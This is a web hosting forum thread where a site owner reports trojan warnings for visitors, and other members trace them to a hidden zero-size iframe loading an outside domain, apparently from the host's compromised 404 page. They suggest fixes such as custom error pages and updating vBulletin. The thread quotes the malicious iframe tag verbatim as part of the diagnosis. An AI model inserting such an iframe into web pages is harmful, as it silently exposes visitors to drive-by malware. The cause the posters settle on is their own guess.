My members are reporting a trojan virus warning when they visit my site. This all began concurrently with the MySQL database problems a day or two ago (I don't know how or if the two are related). But anyway, can anyone help me figure out what is happening and what I need to do to stop it?

My site is....

http://bonanzaworld.net

my forums are....

http://bonanzaworld.net/forums

Thanks for any help....a virus on my site is not something I've encountered before nor know what to do about.

My members are reporting a trojan virus warning when they visit my site. This all began concurrently with the MySQL database problems a day or two ago (I don't know how or if the two are related). But anyway, can anyone help me figure out what is happening and what I need to do to stop it?Who/what are globolook and tgp.la?
Looking at your source, I see: <IFRAME SRC="http://www.tgp.la/or.html" WIDTH=0 HEIGHT=0 marginheight=0 marginwidth=0 scrolling=no></IFRAME> which looks decidedly dodgy.

oh crap, I know I didn't have that there....I must have been hacked! :(

oh crap, I know I didn't have that there....I must have been hacked! :(You're using an outrageously old version of vbulletin, also, your passwords should be 8 letters, totally random, and different for each service (board login, mail, ftp, ops etc). Use something like passwordsafe to keep track of them all.

the question in my mind is whether that is actually in your code or if you have a bad link.

I would recommend checking your code first for tgp.la, if its not there then add a custom 404 using .htacess and see if the problem still exists.

In my opinion the 404 error page for the site we are on has been hacked. It hyjacks some 404 error page requests but not all and attempts to load this virus. So if you have one bad internal link, one image that doesn't load you would then have this problem.

hope that helps

hmm, I have an outdated link to powweb on my site (from when there used to be a program for sending clients to powweb, before the affiliate program). I never bothered removing the link but I'm wondering if that has something to do with it.

I think to be on the safe side on this I'm going to create custom error pages for my site and use htaccess to direct usage to them and not powwebs....I just need to remember what they all are...there's the...

403
404
505

Any other common ones?

Here's a quick list I found:

100 Continue
101 Switching Protocols
200 OK
201 Created
202 Accepted
203 Non-Authoritative Information
204 No Content
205 Reset Content
206 Partial Content
300 Multiple Choices
301 Moved Permanently
302 Moved Temporarily
303 See Other
304 Not Modified
305 Use Proxy
400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Time-Out
409 Conflict
410 Gone
411 Length Required
412 Precondition Failed
413 Request Entity Too Large
414 Request-URL Too Large
415 Unsupported Media Type
500 Server Error
501 Not Implemented
502 Bad Gateway
503 Out of Resources
504 Gateway Time-Out
505 HTTP Version not supported

I'm thinking 403,404 and 500

200 means ok, it would be kind of funny if the webserver let you return a custom 200 error page instead of the real content.

403, 404 and 500 are the only ones you should typically consider having an error page for. You may want 401 as well, depending on your site.

Just to support the theory we've put together in this thread about hacked powweb 404 error pages leading to a trojan horse virus read this person's security blog....the entry under April 15 (Hijacked 404)....

http://www.infosecblog.org/

Btw, I have now created my own 403, 404 and 500 error pages.

(ps. what alarms me is this person said he put in a support ticket to powweb alerting them of the problem on April 15 (same day as my troubles began) but why hasn't powweb addressed this? it sure would have helped me if I'd known about this sooner since it was April 17 before folks in this forum helped me solve the mystery).

(ps. what alarms me is this person said he put in a support ticket to powweb alerting them of the problem on April 15 (same day as my troubles began) but why hasn't powweb addressed this? it sure would have helped me if I'd known about this sooner since it was April 17 before folks in this forum helped me solve the mystery).

Patience is a virtue ;)


EDIT: ooooh...my 333rd post :)

Patience is a virtue ;)As this is the third time that Powweb's 404 page has been hacked / exploited / call it what you will, and in this case appears to be attempting to install malware on visitors PCs, can you not see the urgency? It bothers me, and it bothers me more that it doesn't bother some people!

My understanding is that the problem has been addressed, but I don't know anything more than that.